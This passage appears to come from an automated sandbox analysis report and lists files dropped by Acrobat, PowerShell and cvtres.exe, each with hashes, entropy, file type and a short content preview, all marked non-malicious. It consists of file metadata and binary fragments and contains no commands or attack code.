                                                                                                                          SHA-512:7F68F723BE5F8B33890696C92675F69B51D5683468AF94C153BB07FD5C171B14A2EE9F225AA6E7F8FC2A2F5AC31A9B86FB598677F72DEC08BBF2C6DDF4CAD5A3
                                                                                                                          Malicious:false
                                                                                                                          Preview:.... .c......2........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j...#..#.#.#.#.#.#.#.#.7.7........................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):66726
                                                                                                                          Entropy (8bit):5.392739213842091
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:RNOpblrU6TBH44ADKZEg6CO6okj97nx9aaaplKI2Xb7HYyu:6a6TZ44ADE6CDokNnxu2XvHK
                                                                                                                          MD5:22FB6DFDFE0738C78E23274F9C12F031
                                                                                                                          SHA1:13D16A21160F975E2E63D55CC9200DB9DE56775B
                                                                                                                          SHA-256:2BD358F5CFF449105111AF36371D3DDFA708ECB00EDE7AE111B2803801375B7D
                                                                                                                          SHA-512:233D7FA946B6D49C33670D0E0A890BCA91A0C75389DB52F38FF4B578E95CA397DCA720EAE49246DC14385C38540B6CB45D395046D10A18B0F6C31243FDF1420E
                                                                                                                          Malicious:false
                                                                                                                          Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20010
                                                                                                                          Entropy (8bit):5.02587298723976
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:Kib43WDib4ZUpiHWrxHYv7XX35rhopbjvwRjdvRYvQqvOjJHUkCw0QpeiQ0HzAF8:mW3UpiHWrxHYv7H31hopbjoRjdvRYvrE
                                                                                                                          MD5:7769FE82B8089C97BDE611449DAD1DA5
                                                                                                                          SHA1:EE1A5ACC6AEF47665FB326B56207B1F76DBC7881
                                                                                                                          SHA-256:7FB9949CFD06FBD18B09A6A5E50E680E2086D9AD4DFA6F874DC1AE5390A88D51
                                                                                                                          SHA-512:D2D42954D30275D1BA14657D7DB35E61F7F73AC400E56B660E304FD01BE42FABE7D7FB71ABC13F935EF52A1F21FFC2BC9F582A0280007F3FB27F69421205411A
                                                                                                                          Malicious:false
                                                                                                                          Preview:PSMODULECACHE.......dh.z......C:\Program Files (x86)\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\1.0.1\Microsoft.PowerShell.Operation.Validation.psd1........Get-OperationValidation........Invoke-OperationValidation..........rq.z..M...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSWorkflow\PSWorkflow.psd1........nwsn........New-PSWorkflowExecutionOption........New-PSWorkflowSession........$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo....
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1760
                                                                                                                          Entropy (8bit):5.701686809709793
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:mSU4Yymdax4RIoUP7g9qr9tK8NLn5nOA+y0ax5jl+yF:bHYv+IfL9qr2KLn5nOA5x3Zl
                                                                                                                          MD5:D619AD7C346CE250830E9F8AF944914D
                                                                                                                          SHA1:44087092EE429B98300B7E5BC0AEA83C9133625E
                                                                                                                          SHA-256:848A78FA35148CAD0EF1053148AE687E5DF20F0A082625849303919B05A58104
                                                                                                                          SHA-512:F6EE14B1369A08604C06B98699427F846D4252E93E88535CA822BB1666996BCF238A3DBCB3A0ABD8C75DF5127007CF1AB73BF214904D62C44E07265E23A2A07B
                                                                                                                          Malicious:false
                                                                                                                          Preview:@...e...........R.....................,..............@..........@...............M6.]..O....PI.&........System.Web.Extensions...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.................0..~.J.R...L........System.Data.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:PDF document, version 1.4, 2 pages
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):78011
                                                                                                                          Entropy (8bit):6.737981384666099
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:ZK/PRerOKSg9baQT4YDLJK/0NsVlBKUFVKVSqwp+YEtPH:QeKQbaQTLJKGsVBg5wpNEtH
                                                                                                                          MD5:74D0FE648EFA21028B0C31CE3A5E7697
                                                                                                                          SHA1:307144EBD8BB7C12DB6713858784D0565C310073
                                                                                                                          SHA-256:2D92F1EE0149AF6C9A7BDD1BE5976F668A366B2F298BF0EAE0D094F1131481EE
                                                                                                                          SHA-512:2A86B0243A1868FB7580F5648861AD3E9356D508D6561D234E3ADFD71FE7CC29CE6739FE367BE31D83EDD8BEC4F4E71D29D0B51C966CD4486C48BDFEDC092736
                                                                                                                          Malicious:false
                                                                                                                          Preview:%PDF-1.4.%.....1 0 obj.<<./Type /Catalog./Pages 2 0 R./MarkInfo <<./Type /MarkInfo./Marked true.>>./StructTreeRoot 3 0 R./ViewerPreferences <<./Type /ViewerPreferences./DisplayDocTitle true.>>./Lang (en).>>.endobj.4 0 obj.<<./Title (JD)./Creator (Canva)./Producer (Canva)./CreationDate (D:20241113124118+00'00')./ModDate (D:20241113124118+00'00')./Keywords (DAGWXIVE08M,BAGQk_3Tj5Y)./Author (Madge Ryan).>>.endobj.2 0 obj.<<./Type /Pages./Count 2./Kids [5 0 R 6 0 R].>>.endobj.3 0 obj.<<./Type /StructTreeRoot./K 7 0 R./ParentTreeNextKey 2./ParentTree 8 0 R./IDTree 9 0 R.>>.endobj.5 0 obj.<<./Type /Page./Resources <<./ProcSet [/PDF /Text /ImageB /ImageC /ImageI]./ExtGState <<./G3 10 0 R.>>./Font <<./F4 11 0 R./F5 12 0 R./F6 13 0 R./F7 14 0 R./F8 15 0 R.>>.>>./MediaBox [0.0 0.42001298 612.0 1009.92]./Contents 16 0 R./StructParents 0./Parent 2 0 R./Tabs /S./BleedBox [0.0 0.42001298 612.0 1009.92]./TrimBox [0.0 0.42001298 612.0 1009.92]./Annots [].>>.endobj.6 0 obj.<<./Type /Page./Resources <<.
                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):246
                                                                                                                          Entropy (8bit):3.5193370621730837
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8xOl8VlPNYH:Qw946cPbiOxDlbYnuRK5OHYH
                                                                                                                          MD5:56F9A3B859109B4043045C7FE8529B7F
                                                                                                                          SHA1:5A3A84097D1916B86B9FC547928A9556C07B9468
                                                                                                                          SHA-256:C8A26DB9772BA28BD58143D72BC0CB8004D33F7715C97ECF632532FEFCBD846F
                                                                                                                          SHA-512:D8CAEACCD11BD13DBDC6A2241C3A6892FC9544AE99B003F529138D5AE583EB5B7C99F7E124D712677DC279953C4E3310F9A5DAEE8CFD5AADACABDCCC5A77272F
                                                                                                                          Malicious:false
                                                                                                                          Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .2.9./.1.1./.2.0.2.4. . .0.2.:.3.0.:.5.0. .=.=.=.....
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Fri Nov 29 09:00:02 2024, 1st section name ".debug$S"
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1332
                                                                                                                          Entropy (8bit):3.996995700583962
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:HGFzW916oL6leH/wKqxmNII+ycuZhNQ3akSBgPNnqS2d:6o1oKqxmu1ulQ3a3B4qSG
                                                                                                                          MD5:8F779D0DBCE19A099AD7D67FD694528E
                                                                                                                          SHA1:7D1BCB2BB69C7196344482A8E4D0CD73BB11C780
                                                                                                                          SHA-256:2E1E15672614E0288556B1BBCA88926F6C51A4ED2891A388B816E5F2D2C59566
                                                                                                                          SHA-512:D6816F35381216043D81BBF270B7D5EF9F87EE9032AF5BFA5A274578D70843FA10ECE322503CB189A3A6C2DEAC34FE32236CE1DB3F1BD35A2893815898E68F80
                                                                                                                          Malicious:false
                                                                                                                          Preview:L.....Ig.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........T....c:\Users\user\AppData\Local\Temp\pkwqtvat\CSC14ED126C80BF4A239EEB93A187C6F14.TMP...................8.{.L..l6.|t..........5.......C:\Users\user\AppData\Local\Temp\RES421C.tmp.-.<....................a..Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...p.k.w.q.t.v.a.t...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                          File Type:ASCII text, with very long lines (393)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):16525
                                                                                                                          Entropy (8bit):5.376360055978702
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:6b1sdmfenwop+WP21h2RPjRNg7JjO2on6oU6CyuJw1oaNIIu9EMuJuF6MKK9g9JQ:vIn
                                                                                                                          MD5:1336667A75083BF81E2632FABAA88B67
                                                                                                                          SHA1:46E40800B27D95DAED0DBB830E0D0BA85C031D40
                                                                                                                          SHA-256:F81B7C83E0B979F04D3763B4F88CD05BC8FBB2F441EBFAB75826793B869F75D1
                                                                                                                          SHA-512:D039D8650CF7B149799D42C7415CBF94D4A0A4BF389B615EF7D1B427BC51727D3441AA37D8C178E7E7E89D69C95666EB14C31B56CDFBD3937E4581A31A69081A
                                                                                                                          Malicious:false
                                                                                                                          Preview:SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:961+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                          File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):15114
                                                                                                                          Entropy (8bit):5.320004795128313
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:bkYRgrae2GyZCddn+Us7Ea3eeJC2uEsjE/HtbDdL+LwpHpG/PAb4NicNkas66JJ/:ceL
                                                                                                                          MD5:B40A89F128F741C1E0BB25CC02D5C1AD
                                                                                                                          SHA1:6E043307356A2DE4E84A67B1DC06A6AF5E2213E2
                                                                                                                          SHA-256:E56B47747BFB95245ADC95C92FE74576CA956BF12D5CFFF93C70CAB40DFD05D1
                                                                                                                          SHA-512:8EDE6727047B16E5D46FAA6F5011597D86BB0B01A668BCE9718B0298584959157FB0A6026810A8CB6F1FE56FC93DEA618856F1CA99141E25A8C3C61C4E02BE4A
                                                                                                                          Malicious:false
                                                                                                                          Preview:SessionID=379d7007-7e37-4fd0-8537-d782f28d231e.1732865444448 Timestamp=2024-11-29T02:30:44:449-0500 ThreadID=7440 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=379d7007-7e37-4fd0-8537-d782f28d231e.1732865444448 Timestamp=2024-11-29T02:30:44:451-0500 ThreadID=7440 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=379d7007-7e37-4fd0-8537-d782f28d231e.1732865444448 Timestamp=2024-11-29T02:30:44:451-0500 ThreadID=7440 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=379d7007-7e37-4fd0-8537-d782f28d231e.1732865444448 Timestamp=2024-11-29T02:30:44:451-0500 ThreadID=7440 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=379d7007-7e37-4fd0-8537-d782f28d231e.1732865444448 Timestamp=2024-11-29T02:30:44:451-0500 ThreadID=7440 Component=ngl-lib_NglAppLib Description="SetConf
                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):29752
                                                                                                                          Entropy (8bit):5.394010060577831
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:GLxxlyVUFcAzWL8VWL1ANSFld5YjMWLvJ8Uy++NSXl3WLd5WLrbhhVClkVMwDGb1:M0
                                                                                                                          MD5:0999EC8E9F51D9B57E2BDFDED889D48C
                                                                                                                          SHA1:F4279DCAAE51651C462E476472F6EB77F5B2AD8E
                                                                                                                          SHA-256:D864F3DC47A382D101A3CC9B26768F9BB6587F112F7211FA20946819597BBF95
                                                                                                                          SHA-512:164E671F00849975C02999B8CDEF90256BB8B35385E4BB3178EF64E39C7E154EAC84996E50D41667DCE188D89D9A1B75F4390C57CAA86CEAA893CA92D3190630
                                                                                                                          Malicious:false
                                                                                                                          Preview:04-10-2023 02:39:31:.---2---..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ***************************************..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ***************************************..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : Starting NGL..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..04-10-2023 02:39:31:.Closing File..04-10-
                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 647360
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1407294
